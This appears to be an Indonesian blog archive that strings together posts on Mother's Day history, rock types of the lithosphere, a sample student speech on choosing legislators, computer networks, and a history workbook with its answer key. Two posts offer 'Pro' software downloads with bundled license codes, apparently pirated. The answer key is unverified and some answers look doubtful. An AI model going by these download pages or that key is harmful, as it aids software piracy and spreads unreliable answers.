Selamat Hari Ibu, Para Blogger

Hari ini tepatnya tanggal 22 Desember 2013 merupakan Hari Ibu yang diperingati di Indonesia. Pengertian Hari Ibu yang saya kutip dari id.wikipedia.org
Hari Ibu adalah hari peringatan atau perayaan terhadap peran seorang ibu dalam keluarganya, baik untuk suami, anak-anak, maupun lingkungan sosialnya. Peringatan dan perayaan biasanya dilakukan dengan membebastugaskankan ibu dari tugas domestik yang sehari-hari dianggap merupakan kewajibannya, seperti memasak, merawat anak, dan urusan rumah tangga lainnya. Kalau Ayah mempunyai slogan yaitu Surganya Ibu di bawah kaki Ayah, tetapi slogan Ibu adalah Surganya Anak di bawah kaki Ibu.
Sementara di Amerika dan lebih dari 75 negara lain, seperti Australia, Kanada, Jerman, Italia, Jepang, Belanda, Malaysia, Singapura, Taiwan, dan Hong Kong, Hari Ibu atau Mother’s Day (dalam bahasa Inggris) dirayakan pada hari Minggu di pekan kedua bulan Mei. Di beberapa negara Eropa dan Timur Tengah, Hari Perempuan Internasional atau International Women's Day (dalam bahasa Inggris) diperingati setiap tanggal 8 Maret.

Hari Ibu di Indonesia kutipan dibawah ini saya ambil dari http://id.wikipedia.org/wiki/Hari_Ibu

Sejarah Hari Ibu diawali dari bertemunya para pejuang wanita dengan mengadakan Kongres Perempuan Indonesia I pada 22-25 Desember 1928 di Yogyakarta, di gedung Dalem Jayadipuran> yang sekarang berfungsi sebagai kantor Balai Pelestarian Sejarah dan Nilai Tradisional dan beralamatkan di Jl. Brigjen Katamso.[6] Kongres dihadiri sekitar 30 organisasi perempuan dari 12 kota di Jawa dan Sumatera. Hasil dari kongres tersebut salah satunya adalah membentuk Kongres Perempuan yang kini dikenal sebagai Kongres Wanita Indonesia (Kowani).
Organisasi perempuan sendiri sudah ada sejak 1912, diilhami oleh perjuangan para pahlawan wanita abad ke-19 seperti Martha Christina Tiahahu, Cut Nyak Dhien, Tjoet Nyak Meutia, R.A. Kartini,[7] Maria Walanda Maramis, Dewi Sartika, Nyai Ahmad Dahlan, dan lain-lain.[8]
Peristiwa itu dianggap sebagai salah satu tonggak penting sejarah perjuangan kaum perempuan Indonesia. Pemimpin organisasi perempuan dari berbagai wilayah se-Nusantara berkumpul menyatukan pikiran dan semangat untuk berjuang menuju kemerdekaan dan perbaikan nasib kaum perempuan. Berbagai isu yang saat itu dipikirkan untuk digarap adalah persatuan perempuan Nusantara, pelibatan perempuan dalam perjuangan melawan kemerdekaan, pelibatan perempuan dalam berbagai aspek pembangunan bangsa, perdagangan anak-anak dan kaum perempuan, perbaikan gizi dan kesehatan bagi ibu dan balita, pernikahan usia dini bagi perempuan, dan sebagainya. Tanpa diwarnai gembar-gembor kesetaraan gender, para pejuang perempuan itu melakukan pemikiran kritis dan aneka upaya yang amat penting bagi kemajuan bangsa.
Penetapan tanggal 22 Desember sebagai perayaan Hari Ibu diputuskan dalam Kongres Perempuan Indonesia III pada tahun 1938.[9] Peringatan 25 tahun Hari Ibu pada tahun 1953 dirayakan meriah di tak kurang dari 85 kota Indonesia, mulai dari Meulaboh sampai Ternate.
Presiden Soekarno menetapkan melalui Dekrit Presiden No. 316 tahun 1959 bahwa tanggal 22 Desember adalah Hari Ibu dan dirayakan secara nasional hingga kini.
Misi diperingatinya Hari Ibu pada awalnya lebih untuk mengenang semangat dan perjuangan para perempuan dalam upaya perbaikan kualitas bangsa ini. Dari situ pula tercermin semangat kaum perempuan dari berbagai latar belakang untuk bersatu dan bekerja bersama. Di Solo, misalnya, 25 tahun Hari Ibu dirayakan dengan membuat pasar amal yang hasilnya untuk membiayai Yayasan Kesejahteraan Buruh Wanita dan beasiswa untuk anak-anak perempuan. Pada waktu itu panitia Hari Ibu Solo juga mengadakan rapat umum yang mengeluarkan resolusi meminta pemerintah melakukan pengendalian harga, khususnya bahan-bahan makanan pokok. Pada tahun 1950-an, peringatan Hari Ibu mengambil bentuk pawai dan rapat umum yang menyuarakan kepentingan kaum perempuan secara langsung.[10]
Satu momen penting bagi para wanita adalah untuk pertama kalinya wanita menjadi menteri adalah Maria Ulfah di tahun 1946. Sebelum kemerdekaan Kongres Perempuan ikut terlibat dalam pergerakan internasional dan perjuangan kemerdekaan itu sendiri. Tahun 1973 Kowani menjadi anggota penuh International Council of Women (ICW). ICW berkedudukan sebagai dewan konsultatif kategori satu terhadap Perserikatan Bangsa-bangsa.
Kini, Hari Ibu di Indonesia diperingati untuk mengungkapkan rasa sayang dan terima kasih kepada para ibu, memuji keibuan para ibu. Berbagai kegiatan pada peringatan itu merupakan kado istimewa, penyuntingan bunga, pesta kejutan bagi para ibu, aneka lomba masak dan berkebaya, atau membebaskan para ibu dari beban kegiatan domestik sehari-hari.
Hari IBU

SELAMAT HARI IBU..
wisonirgmailcom

Magic Hour Camera Pro v1.3.20

Download Magic Hour Camera Pro v1.3.20 - Download Magic Hour Camera Pro Apk - Magic Hour Camera v1.3.20 Apk. Magic Hour adalah sebuah aplikasi yang dapat mengubah foto biasa Anda ke yang luar biasa . Ini akan memberi Anda pengalaman yang menyenangkan yang belum pernah Anda miliki. Magic Hour berarti. Satu jam sihir adalah yang pertama dan satu jam terakhir sinar matahari di siang hari ,ketika efek fotografi tertentu dicapai karena kualitas cahaya. Kami menempatkan saat singkat dari Magic Hour yang membuat segala sesuatu indah ke app kami .

Download Magic Hour Camera, Magic Hour Camera v1.3.20

Download Magic Hour Camera Pro v1.3.20:

Tangkap momen kehidupan sehari-hari !
  • Gunakan grid , sentuh foto layar mengambil kemampuan , kemampuan flash ( ditawarkan dalam perangkat yang tersedia ) dan kamera depan ( ditawarkan di Galaxy S , S2 , Nexus 2 dengan Gingerbread ) .
  • " Simpan Foto Asli " ​​fungsi .
Membuat kenangan Anda lebih berharga !
Dengan menggunakan 40 filter mengagumkan yang kami sediakan , mengubah foto Anda menjadi karya seni. Hanya membutuhkan waktu beberapa PDAM .

Transfer foto biasa-biasa saja yang profesional dengan beberapa PDAM !
  • Gunakan Curves , Saturation , Brightness , Contrast , 8 jenis sketsa , 23 jenis Textures dan 12 pilihan bingkai yang berbeda .Retouch kurva , kecerahan, kontras , sketsa , tekstur , dan bingkai foto Anda .
  • Dengan demikian , Anda dapat membuat filter sesuai suasana hati Anda , rasa dan gaya . Anda juga dapat menyimpan filter Anda dan menggunakannya lagi kapan saja .
  • Membuat filter dan mengeditnya kapan saja
Posting foto dan berbagi dengan teman-teman Anda dan seluruh dunia .
  • Anda dapat berbagi foto di layanan jaringan sosial seperti facebook , twitter , flickr , tumblr , WhatsApp , KakaoTalk !
  • Pilih wall facebook atau album , twitpic atau yfrog via twitter atau hanya email ke teman-teman Anda
  • Anda hanya dapat menggunakan Magic Hour pada menu share Gallery Anda .
FREE Filter Market ! Sungguh menakjubkan !
Foto apa app akan menyenangkan tanpa memperbarui itu dengan filter baru ?
Kami menyediakan Anda dengan filter tak terbatas dari Filter Market. Anda dapat meng-upload filter Anda dan membaginya dengan teman dan siapa saja dengan aplikasi Magic Hour .
  • Download ton filter bebas dari Filter Market.
  • Bagi filter Anda dengan teman-teman dan siapa saja dengan aplikasi Magic Hour melalui Filter Market.
Ukuran layar yang didukung
  • 320x480 , 480x800 , 480x854 , 600x1024
Sekian mengenai artikel Magic Hour Camera Pro v1.3.20.
wisonirgmailcom Android Apps

Batuan Pembentuk Litosfer

Batuan Pembentuk Litosfer - Kerak Bumi dibentuk oleh berbagai jenis batuan dengan kandungan mineral yang berbeda-beda. Pada dasarnya, hampir semua jenis batuan yang membentuk litosfer berasal dari pembekuan magma gunungapi dikenal dengan batuan beku. Namun karena adanya proses-proses alamiah yang lebih lanjut berupa pengendapan dan perubahan wujud, terbentuklah berbagai jenis batuan baru yang tergolong ke dalam kelompok batuan sedimen dan batuan metamorfosis.

Batuan Penyusun Litosfer, Batuan Pembentuk Litosfer

A. Batuan Beku
Batuan Beku (Igneous rock) merupakan jenis batuan yang terbentuk dari pembekuan magma gunungapi. Proses pembekuan magma ini dapat terjadi di dalam litosfer (dalam tubuh gunungapi) atau di permukaan Bumi setelah terjadi letusan gunungapi. Batuan beku ini sangat banyak jenisnya. Untuk memudahkan dalam penelaahan sifat-sifat fisik dan kimiawinya, para ahli ilmu kebumian mencoba mengelompokkan atau mengklasifikasikan batuan beku berdasarkan dasar-dasar tertentu.

Lava Merah, Aliran Lava Gunung
Aliran Lava

Pembentukan batuan beku diawali oleh pendinginan lava pijar yang ke luar ke permukaan. Berdasarkan genesa atau lokasi terjadinya, batuan beku dibedakan menjadi dua kelompok utama, yaitu sebagai berikut.

1. Batuan Intrusiva, yaitu batuan beku yang terbentuk di dalam litosfer atau di dalam kantung-kantung magma. Beberapa contoh batuan intrusi antara lain Granit, Sienit, Diorit, dan Gabro. Dilihat dari bentuk dan strukturnya, batuan intrusiva antara lain sebagai berikut.

a. Bentuk Diskordan yaitu intrusiva yang strukturnya memotong lapisan-lapisan batuan di sekitarnya. Bentuk diskordan meliputi antara lain sebagai berikut.

  1. Batolith yaitu dapur magma yang telah membeku.
  2. Gang atau Korok yaitu intrusiva yang berbentuk tipis dan panjang, dengan arah vertikal atau miring.
  3. Apofisa yaitu cabang-cabang dari gang.
  4. Diatrema yaitu intrusiva yang mengisi cerobong gunung api atau pipa letusan, mulai dari dapur magma sampai batas kawah.

b. Bentuk Konkordan, yaitu batuan intrusi yang strukturnya searah atau sejajar dengan lapisan-lapisan batuan di sekitarnya, meliputi antara lain sebagai berikut.

  1. Sill yaitu intrusiva yang berbentuk tipis dan pipih, terletak di antara lapisan batuan di sekitarnya.
  2. Lakolit yaitu intrusiva yang berbentuk lensa cembung, terletak di antara lapisan-lapisan atau celah batuan di sekitarnya.

2. Batuan Ekstrusiva yaitu batuan yang terbentuk dari pem bekuan lava di permukaan Bumi setelah terjadinya letusan gunungapi. Contoh ekstrusiva antara lain Riolit, Traktit, Andesit, Dasit, dan Basal.

Penyusun Batu Basal, Proses Terbentuknya Batu Basal

Proses Pembentukan Batuan Basalt

Batuan beku juga dapat diklasifikasikan berdasarkan kandungan silikat atau kuarsa dalam magmanya, yaitu sebagai berikut.

  1. Batuan Beku Asam (Granitis) yaitu batuan beku yang berasal dari magma yang bersifat asam karena banyak mengandung mineral kuarsa (SiO2), sedangkan kandungan Oksida Magnesiumnya (MgO) rendah.
  2. Batuan Beku Intermediet (Andesitis) yaitu bakuan beku yang berasal dari magma pertengahan dengan perbandingan mineral kuarsa (SiO2) dan Oksida Magnesium (MgO) relatif seimbang.
  3. Batuan Beku Basa (Basaltis) yaitu bakuan beku yang berasal dari magma yang bersifat basa karena banyak mengandung mineral Oksida Magnesium (MgO), sedangkan kandungan kuarsanya (SiO2) rendah.

B. Batuan Sedimen
Batuan sedimen terbentuk akibat proses pengendapan. Proses pembentukan batuan sedimen berawal dari adanya pemecahan (detachment) batuan induk menjadi bagian-bagian yang ukurannya lebih kecil.
Pecahan batuan tersebut kemudian diangkut atau dipindahkan ke tempat lain oleh zat pengangkut, baik tenaga air yang mengalir, angin, maupun gletser sampai pada akhirnya diendapkan di suatu tempat. Beberapa contoh jenis batuan sedimen antara lain breksi, konglomerat, batu gamping (kapur), batu pasir, lanau, batu bara, dan rijang. Secara umum, batuan sedimen dapat dikelompokkan berdasarkan atas cara pengendapan, tenaga yang mengendap kannya, dan tempat pengendapannya.

1. Berdasarkan Cara Pengendapan
Berdasarkan cara pengendapannya, batuan sedimen dibagi atas dua jenis, yaitu sebagai berikut.

a. Hancur Mengendap Jenis endapannya disebut endapan klastik atau endapan mekanis. Berdasarkan ukuran butirannya, sedimen klastik terbagi menjadi dua jenis, yaitu sebagai berikut.

  1. Tekstur (butiran) kasar, biasanya diendapkan di lingkungan darat, sungai, atau danau. Contoh jenis ini antara lain breksi, konglomerat, dan batu pasir.
  2. Tekstur (butiran) halus, biasanya diendapkan di lingkungan laut. Contohnya antara lain batu lempeng, lanau, serpih, dan napal.
b. Larut Mengendap Prosesnya terdiri atas proses langsung dan tidak langsung.

1. Proses langsung. Akibat adanya campuran pengaruh unsur lain, batuan akan melarut dan mengendap dengan cepat membentuk batuan lain.

Konglomerat memiliki tekstur permukaan kasar yang diakibatkan oleh penyatuan berbagai material, antara lain oleh air sungai.
Salah satu bentuknya akan membentuk batuan sedimen evaporit. Batuan sedimen ini terjadi akibat adanya penguapan dari larutan yang mengandung bahan baku dari batuan tersebut. Syarat terbentuknya batuan evaporit adalah sebagai berikut.

a. Adanya wilayah perairan yang mengandung larutan kimia cukup pekat seperti larutan garam.
b. Wilayah perairan tersebut merupakan kawasan yang tertutup seperti danau atau laut yang tidak berlepasan (laut di pedalaman benua). Akibat proses penguapan akan terjadi proses penambahan unsur-unsur yang terkandung dalam larutan tersebut.
c. Tingkat penguapan sangat tinggi, sehingga terbentuk endapan dalam jumlah yang banyak untuk membentuk batuan sedimen evaporit. Contoh batuan sedimen evaporit antara lain gips, anhidrit, dan batu garam.

2. Proses tidak langsung. Pembentukan batuan baru yang dibentuk dalam waktu yang relatif lama dan mendapat pengaruh dari bahan-bahan organik. Contohnya, sedimen batubara. Batubara adalah jenis batuan sedimen yang terbentuk atas unsur-unsur organik berupa sisa-sisa tumbuhan terutama sejenis pakis. Pada saat tumbuhan mati, dengan cepat tetumbuhan tidak sampai lapuk. Akibat suhu dan tekanan tinggi dalam waktu yang sangat lama, sisa tumbuhan berubah menjadi endapan batubara.

Batu Bara terbentuk dari pengendapan sisa-sisa tumbuhan dan bahan-bahan organik dalam waktu yang lama.

Artikel selebihnya anda bisa download : Download Batuan Pembentuk Litosfer
Sekian mengenai Batuan Pembentuk atau Penyusun Litosfer.
wisonirgmailcom Geografi

Contoh Pidato Tentang Politik Indonesia

Contoh Pidato Tentang Politik Indonesia - Naskah Pidato Tentang Politik sudah banyak sekali. Contoh Pidato ada yang bertemakan Politik, Kenakalan Remaja dan masih banyak lagi. Pidato tentang Politik juga sangat bermacam-macam. Contoh Pidato Mengenai Politik yang akan saya bagikan dibawah ini merupakan Pidato Tentang Politik.

Naskah Pidato, Teks Pidato Tentang Politik
PANCASILA

Judul Pidato : Kiat Memilih Wakil Rakyat Yang Amanah dan Bertanggung Jawab

Selamat Pagi Semua
Pertama-tama marilah kita ucapkan puji syukur kepada Tuhan Yang Maha Esa karena kita diberi kesehatan dapat berkumpul dipagi hari yang cerah ini.

Yang saya hormati Ibu Jumiati selaku guru pembimbing serta teman-teman yang saya sayangi. Pada kali ini saya akan memberikan informasi mengenai Kiat Memilih Wakil Rakyat Yang Amanah dan Bertanggung jawa.

Berbagai iklan politik, baik above the line maupun below the line, hampir tiap saat menteror kita untuk mau memilihnya. Sayangnya, kita seringkali dihadapkan pada kenyataan akan miskinnya informasi dan referensi tentang figur-figur calon wakil rakyat tersebut. Alhasil, kita pun terserang stigma ambigu dan dualisme antara memilih dan tidak memilih.

Nah, agar tidak terjebak dalam ambiguitas dan skeptisisme, berikut ini ada Tips Cerdas untuk memilih para wakil rakyat, yang akan membawa Anda pada kemantapan pada pilihan.

Bapak-bapak, Ibu-ibu dan para hadirin semua yang saya banggakan,
Sekali salah dalam memilih wakil kita maka 5 tahun kita menjadi korban. Bisa jadi ketika berkampanye mereka begitu manis mengumbar janji namun setelah jadi lupa segala yang diomongkannya. Bahkan kepada tim suksesnya pun lupa. Sungguh tidak tahu balas budi. Ia hanya mementingkan perut dan keperluannya sendiri. Karenanya jangan sampai kita salah memilih wakil kita nanti.

Ada beberapa tips yang bisa kita lakukan untuk memilih wakil kita jangan sampai salah keputusan, antara lain :
Riset dan selidiki track record caleg pilihan Anda. Cek di internet, apa saja yang sudah ia katakan, lakukan, latar belakang pribadi, pendidikan, prestasinya, atau afiliasi kelompok atau politiknya. Kalau sudah terkenal biasanya ia punya website/blog pribadi, sehingga kita akan mudah mendapatkan data dan informasi yang cukup tentang caleg itu.

Tapi kalau ia tidak pernah atau jarang bersentuhan dengan dunia media, baik cetak, elektronik, maupun internet, lakukan secara offline. Memang butuh waktu ekstra, misalnya dengan bertanya2 kepada tetangga yang tinggal di sekitar rumahnya, temantemen sekolahnya, koleganya, atau bahkan pesaing-pesaingnya.

Kalau ada kesempatan, ajak si caleg berdiskusi secara langsung. Mulailah dari tematema yang menjadi concern-nya (Dapat Anda lihat dari poster, spanduk, dan atributkampanyenya yang lain—yang seringkali hanya slogan tanpa konsep), hingga berkaitandengan isu-isu yang menjadi kepentingan Anda sendiri. Misalnya, soal perekonomian dan kesejahteraan umat, harga BBM dan lain-lain.

Pastikan juga dalam proses di atas, apakah ia orang yang FAST (fathanah, amanah, shiddiq, tabligh), atau tidak, dan lain-lain. Gagasan dari caleg yang layak pilih adalah gagasan yang rasional dan mencerdaskan, mendewasakan, dan dapat dipertanggungjawabk an. Ia tidak menawarkan pembagian uang, tidak merendahkanmartabat orang lain dengan black campaign, serta tidak memberi janji surga yangmengecewakan di kemudian hari. Setelah itu, simpulkan dari situ apakah ia layak pilih atau tidak.

Setelah cukup yakin dengan pilihan Anda, lebih jauh lakukan “kontrak politik”dengan caleg pilihan Anda. Buat komitmen permanen, untuk jangka pendek maupunjangka panjang. Bentuknya bisa berbentuk lisan maupun tertulis, bersama-sama atausendiri. Isinya bisa apa saja, apakah berupa janji kalau ia terpilih menjadi wakil rakyat, ia akan memperjuangkan kepentingan dan kesejahteraan umat/rakyat. Dan lain–lain.

Meski proses kampanye sudah berlangsung, tidak ada kata terlambat untuk mencari tahu. Buatlah daftar para caleg yang ada di tempat Anda. Segera lakukan tips di atas. Semakin banyak Anda tahu dan mengumpulkan informasi valid tentang para caleg itu, maka itu semakin baik untuk penentuan caleg pilihan Anda.

Semoga apa yang saya uraikan tadi dapat bermanfaat untuk kita semua. Dan semoga kita diberikan wakil-wakil rakyat yang amanah, bertanggung jawab, punya nurani dan berpihak kepada kebenaran. Mohon maaf jika ada kata-kata yang kurang berkenan.

Selamat Pagi

Artikel yang saya bagikan diatas adalah Contoh Teks Naskah Pidato Tentang Politik yang dapat saya bagikan kepada pengunjung blog Info Online.
wisonirgmailcom Bahasa Indonesia, Pendidikan

ExtremeCopy Pro 2.3.3 Final 32-bit

ExtremeCopy Pro 2.3.3 Final 32-bit - ExtremeCopy adalah aplikasi salinan Windows file yang mampu menyalin dan / atau memindahkan file Anda sangat cepat. Penggunaan yang sederhana dan mirip dengan Windows Explorer file default mesin fotokopi tetapi dapat meningkatkan kecepatan dari 20% hingga 120% lebih cepat dari standar Windows file fotokopi. ExtremeCopy dapat mengintegrasikan dirinya ke dalam Windows Anda mulus sebagai alat copy. Jika Anda tertarik untuk mempelajari lebih lanjut tentang produk kami, jangan ragu untuk klik di sini untuk melihat lebih banyak fitur.

Download ExtremeCopy Pro 2.3.3 Final 32-bit


Agar bisa menggunakan ExtremeCopy Pro anda harus register terlebih dahulu.
1. Buka ExtremeCopy
2. Lalu pilih Tool, Register
3. Masukkan License Code yang ada didalam folder yang barusan anda download

Sekian mengenai ExtremeCopy Pro 2.3.3 Final 32-bit.
wisonirgmailcom Software

Kunci Jawaban Bab 2 LKS Sejarah Kelas X

Download Kunci Jawaban LKS Sejarah SMA Kelas X - Download Jawaban LKS Sejarah KTSP - Kunci Jawaban Sejarah Kelas X Semester 1 Tradisi Sejarah Masyarakat Indonesia Masa Pra-Aksara - Download Kunci Jawaban SMA LKS Sejarah Semester 1 Tradisi Sejarah Masyarakat Indonesia Masa Aksara - Download Bab 2 Tradisi Sejarah Masyarakat Indonesia Masa Pra-Aksara - Ringkasan Mengenai Hakikat dan Ruang Lingkup Ilmu Sejarah.

Kunci Jawaban Bab 2 LKS Sejarah Kelas X


1. Tradisi/adat istiadat diwariskan kepada seorang anak melalui ...
a. intensifikasi
b. sosialisasi
c. humanisasi
d. stratifikasi
e. eliminasi

2. Langkah pertama yang dilakukan oleh pihak keluarga di dalam mewariskan masa lalunya adalah ...
a. mewariskan hartanya
b. memberikan pendidikan secukupnya
c. menuntut agar tertib
d. mengajarkan etika (sopan santun)
e. mendorong agar masa lalunya dapat dikembangkan

3. Tradisi lisan terutama masih hidup di ...
a. masyarakat sejarah
b. negara-negara maju
c. negara industri maju
d. masyarakat yang tingkat melek hurufnya rendah
e. masyarakat yang bebas buta huruf

4. Tujuan masyarakat mewariskan masa lampaunya kepada generasi muda adalah ...
a. agar generasi sekarang dapat membuah sisilah keluarga
b. agar pengetahuan generasi sekarang bertambah
c. agar generasi sekarang dapat hidup sejahtera
d. agar generasi berikutnya dapat melanjutkan masa lalu tersebut
e. agar generasi selanjutnya dapat memperbaiki masa lalu tersebut

5. Rumah Gadang merupakan contoh dari arsitektur rakyat yang berasal dari daerah ...
a. Sumatra Selatan
b. Sumatra Barat
c. Sulawesi Tengah
d. Jawa Timur
e. Papua

6. Adanya legenda tentang makhluk halus seperti hantu termasuk ...
a. legenda keagamaan
b. legenda perorangan
c. legenda setempat
d. legenda alam lain
e. legenda tentang alam gaib

7. Di bawah ini termasuk ciri-ciri foklor, kecuali ...
a. bersifat tradisional
b. bersifat anomin
c. hadir dalam versi yang nonoton
d. menjadi milik bersama
e. penyebarannya secara lisan

8. Pertunjukan wayang dari masa prasejarah hingga masa sekarang tetap eksis. Fungsi pertunjukan wayang pada mulanya ialah ...
a. pemujaan arwah nenek moyang
b. sebagai sarana berkumpulnya masyarakat
c. ajang pertemuan warga masyarakat
d. sarana hiburan masyarakat
e. media pendidikan masyarakat

9. Penulisan Babad merupakan salah jenis penulisan ...
a. historiografi kolonial
b. historiografi tradisional
c. historiografi nasional
d. historiografi daerah
e. historiografi internasional

10. Historiografi kolonial biasanya ditulis oleh ...
a. orang-orang Indonesia, maka sifatnya Indonesia sentris
b. orang-orang daerah koloni, maka sifatnya kolonial sentris
c. para Pujangga istanam maka sifatnya istana sentris
d. para penulis Belanda, maka sifatnya Nederland sentris
e. orang-orang Belanda dengan menggunakan metode wawancara dengan orang-orang di tanah koloni

11. Contoh-contoh di bawah ini yang termasuk legenda setempat ialah ...
a. Cerita Sangkuriang dan cerita Lara Jonggrang
b. Cerita Panji dan Jayaprana
c. Nyi Roro Kidul dan Joko Tarub
d. Cerita Sundel Bolong dan Gendruwo
e. Cerita Calon Arang dan Mpu Baradha

12. Mite adalah cerita rakyat dalam bentuk prosa yang dianggap benar-benar terjadi serta dianggap suci oleh yang empunya cerita. Tokoh-tokoh yang tampil dalam mite ialah ...
a. raja-raja besar
b. orang-orang penting pada zamannya
c. makhluk halus
d. dewa atau makhluk setengah dewa
e. orang-orang yang dianggap berkharisma

13. Penulisan sejarah lama, pendekatannya menggunakan pendekatan ...
a. deskriptis - naratif
b. deskriptis kritis
c. kritis - ilmiah
d. naratif - ilmiah
e. kritis - deskriptif

14. Di bawah ini adalah contoh-contoh historiografi nasional, kecuali ...
a. Sejarah Nasional Indonesia, Jilid I sampai dengan VI, editor Sartono Kartodirdjo
b. Peranan Bangsa Indonesia dalam Sejarah Asia Tenggara, karya R. Moh. Ali
c. Sejarah Perlawanan-Perlawanan Terhadap Kolonialisme dan Imperialisme editor Sartono Kartodirdjo
d. Pemberontakan Banten oleh Sartono Kartodirdjo
e. Nusantara oleh Bernard Vlekke

15. Sejarah Melayu, Hikayat Raja-Raja Pasai merupakan contoh dari ...
a. historiografi tradisional
b. historiografi seberang
c. historiografi nasional
d. historiografi kolonial
e. historiografi internasional

16. Historiografi nasional mulai dirintis setelah ...
a. Indonesia dijajah Belanda
b. munculnya Orde Baru
c. Indonesia merdeka pada 17 Agustus 1945
d. Indonesia dijajah Jepang
e. Setelah Perang Kemerdekaan tahun 1949

17. Ciri-ciri sejarah baru (the new history) adalah sebagai berikut, kecuali ...
a. pendekatannya multidimensional
b. cakupannya cukup luas
c. temannya luas dan beragam
d. dikenal juga sebagai sejarah total (total history)
e. pelakunya adalah orang-orang besar

18. Adat dan tata cara penguburan di Indonesia beraneka ragam. Upacara penguburan yang mempunyai beberapa tahapan biasanya dilakukan oleh masyarakat/suku di bawah ini, kecuali ...
a. Nias
b. Batak
c. Sumba
d. Toraja
e. Jawa

19. Tradisi Imlek adalah pergantian tahun menurut kalender Cina, yang dimaksud ialah ...
a. pergantian dari musim dingin ke musim semi
b. pergantian dari musim semi ke musim dingin
c. pergantian dari musim dingin ke musim panas
d. pergantian dari musim gugur ke musim semi
e. pergantian dari musim rontok ke musim semi

20. Salah satu sifat historiografi tradisional ialah religio-sentris, artinya ...
a. segala sesuatu dipusatkan pada raja
b. dihubungkan dengan hal-hal yang gaib
c. raja dianggap memiliki kharisma
d. dihubungkan dengan hal-hal yang tahayul
e. yang dibicarakan hanyalah golongan bangsawan

21. Upacara pembakaran mayat pada masyarakat Bali disebut ...
a. Tiwah
b. Ngaben
c. Geblak
d. Nyewu
e. Kremasi

22. Hari raya Waisak jatuh pada hari "Purnamasidi" (bulan purnama) di bulan ...
a. Februari
b. Maret
c. April
d. Mei
e. Juni

23. Tiga buah candi di Indonesia yang menjadi pusat Perayaan Waisak adalah ...
a. Pawon, Mendut, dan Borobudur
b. Prambanan, Mendut, dan Borobudur
c. Prambanan, Klasan, dan Borobudur
d. Pawon, Mendut, dan Sewu
e. Sewu, Mendut dan Borobudur

24. Tradisi perayaan Idul Fitri atau Lebaran dilakukan umat Islam setiap tanggal ...
a. 1 Muharam
b. 15 Muharam
c. 19 Dzulhijah
d. 1 Syawal
e. 12 Rabiul awal

25. Upacara pembakaran mayat pada masyarakat Dayak di Kalimantan Tengah disebut ...
a. Tiwah
b. Ngaben
c. Geblak
d. Nyewa
e. Kremasi

26. Pertunjukan wayang dari masa dulu hingga sekarang terus mengalami perkembangan. Hal ini dikarenakan ...
a. wayang berasal dari India
b. mengikuti perkembangan zaman
c. wayang sebagai media diakwah agama
d. wayang sebagai media pendidikan para leluhur
e. wayang merupakan upacara pemujaan arwah nenek moyang

27. Wayang digunakan sebagai dakwah, pertama kali dilakukan oleh para wali khusunya ...
a. Sunan Ampel
b. Sunan Drajat
c. Sunan Kudus
d. Sunan Muria
e. Sunan Kalijaga

28. Dalam waktu satu tahun Keraton Surakarta dan Yogyakarta melakukan Upacara Grebeg sebanyak ...
a. sekali
b. dua kali
c. tiga kali
d. empat kali
e. lima kali

29. Upacara labuhan merupakan adat-istiadat dan turun temurun di Keraton Yogyakarta, yakni sejak masa pemerintahan ...
a. Panembahan Senopati
b. Sultan Agung Hanyokrokusumo
c. Amangkurat I
d. Amangkurat II
e. Hamengkubuwono I

30. Cerita Panji, Jayaprana dan Calon Arang termasuk ...
a. Legenda Keagamaan
b. Legenda Setempat
c. Legenda Perorangan
d. Legenda Pertentangan
e. Legenda Alam Gaib

31. Legenda yang menceritakan terjadinya Gunung Tangkuban Perahu berasal dari daerah ...
a. Jawa Barat
b. Jawa Tengah
c. Jawa Timur
d. Yogyakarta
e. Madura

32. Cerita dongeng merupakan salah satu cara masyarakat mewariskan masa lampaunya melalui ...
a. keluarga
b. sekolah
c. masyarakat
d. teman sepermainan
e. kepala suku

33. Di bawah ini termasuk ciri-ciri folklor, kecuali ...
a. bersifat tradisional
b. bersifat anonim
c. hadir dalam versi yang monoton
d. menjadi milik bersama
e. penyebarannya secara lisan

34. Pengertian mite yang benar adalah ...
a. cerita prosa rakyat yang dianggap benar-benar terjadi
b. cerita prosa rakyat yang dianggap benar-benar terjadi, tetapi tidak dianggap suci
c. cerita prosa rakyat yang dianggap benar-benar dan dianggap suci
d. cerita prosa rakyat yang fiktir
e. cerita prosa rakyat tentang orang-orang besar

35. Cerita tentang Rara Anteng dan Joko Seger merupakan contoh ...
a. mite
b. legenda
c. animisme
d. dongeng
e. sejarah lokal

36. Serampang Duabelas adalah salah satu tarian daerah yang berasal dari ...
a. Maluku
b. Jawa Tengah
c. Jawa Barat
d. Sumatra Utara
e. Sumatra Barat

37. Mamanda adalah salah satu pertunjukan rakyat yang berasal dari ...
a. Sulawesi Utara
b. Sulawesi Tengah
c. Kalimantan
d. Maluku
e. Papua

38. Berikut adalah fungsi nyanyian rakyat, kecuali ...
a. legitimasi sebuah suku
b. menyampaikan ramalan
c. memelihara sejarah setempat
d. merupakan aspek mitos
e. protes sosial

39. Masalah arsitektur pada masyarakat Indonesia sebelum mengenal tulisan (pra-aksara) difokuskan pada ...
a. pembangunan sungai
b. pembangunan pasar
c. pembangunan rumah penduduk
d. pembangunan rumah kepala suku
e. pembangunan miniatur

40. Kerajinan tangan adalah salah satu bentuk ...
a. folklor otentik
b. folklor lisan
c. folklor non lisan
d. mitologi
e. legenda

Kunci Jawaban LKS Mandiri Kelas X Bab 2:

  1. b
  2. d
  3. d
  4. d
  5. b
  6. e
  7. c
  8. a
  9. b
  10. d
  11. a
  12. d
  13. a
  14. e
  15. a
  16. c
  17. e
  18. e
  19. a
  20. a
  21. b
  22. d
  23. a
  24. d
  25. a
  26. d
  27. e
  28. c
  29. a
  30. c
  31. a
  32. c
  33. c
  34. c
  35. a
  36. d
  37. c
  38. a
  39. d
  40. c
Sekian mengenai Kunci Jawaban Bab 2 LKS Sejarah Kelas X. Semoga bermanfaat.
wisonirgmailcom Kunci Jawaban, Pendidikan, Sejarah

Macam Macam Jaringan Komputer

Pengertian Jaringan Komputer sebelumnya sudah saya jelaskan yaitu sebuah sistem yang terdiri atas komputer dan perangkat jaringan lainnya seperti: kabel, switch, HUB, router, dll yang bekerja bersama-sama untuk mencapai suatu tujuan yang sama. Dalam mempelajari macam-macam jaringan komputer terdapat dua klasifikasi yang sangat penting yaitu teknologi transmisi dan jarak. Secara garis besar, terdapat dua jenis teknologi transmisi yaitu :

  1. Jaringan broadcast
  2. Jaringan point-to-point

Berbagai Macam Jaringan Komputer, Manfaat Jaringan Komputer, Pengertian Jaringan Komputer

Jaringan broadcast memiliki saluran komunikasi tunggal yang dipakai bersama-sama oleh semua mesin yang ada pada jaringan.

